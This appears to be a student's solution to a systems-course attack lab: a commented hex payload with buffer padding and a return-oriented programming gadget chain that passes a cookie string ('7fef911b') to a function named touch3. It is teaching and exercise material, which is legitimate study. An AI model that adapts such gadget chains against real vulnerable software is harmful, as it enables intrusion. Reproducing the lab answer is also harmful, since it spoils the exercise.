00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # 40 bytes of padding
5c 19 40 00 00 00 00 00 # return addr (movq %rsp, %rax)
9e 19 40 00 00 00 00 00 # return addr (movl %eax, %ecx)
fd 19 40 00 00 00 00 00 # return addr (movl %ecx, %edx)
e7 19 40 00 00 00 00 00 # return addr (movl %edx, %esi)
4b 19 40 00 00 00 00 00 # return addr (popq %rax)
48 00 00 00 ff 7f 00 00 # 0x7fff00000048 (to be popped into %rax; offset from initial %rsp to cookie)
28 19 40 00 00 00 00 00 # return addr (movq %rax, %rdi)
55 19 40 00 00 00 00 00 # return addr (leaq (%rdi,%rsi,1), %rax)
3c 19 40 00 00 00 00 00 # return addr (movq %rax, %rdi)
8c 18 40 00 00 00 00 00 # return addr (touch3)
37 66 65 66 39 31 31 62 00 # "7fef911b" (cookie string)